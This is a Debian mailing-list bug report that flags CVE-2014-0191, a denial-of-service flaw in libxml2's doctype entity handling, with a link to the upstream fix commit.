[xml/sgml-pkgs] Bug#747309: CVE-2014-0191
Moritz Muehlenhoff
jmm at debian.org
Wed May 7 11:40:26 UTC 2014
Package: libxml2
Version: 2.9.1+dfsg1-3
Severity: grave
Tags: security
Hi,
from oss-security. This was assigned CVE-2014-0191
| It was discovered that libxml2, a library providing support to read,
| modify and write XML files, incorrectly performs entity substituton in
| the doctype prolog, even if the application using libxml2 disabled any
| entity substitution. A remote attacker could provide a
| specially-crafted XML file that, when processed, would lead to the
| exhaustion of CPU and memory resources or file descriptors.
|
| This issue was discovered by Daniel Berrange of Red Hat.
Fix:
https://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df
Cheers,
Moritz
More information about the debian-xml-sgml-pkgs
mailing list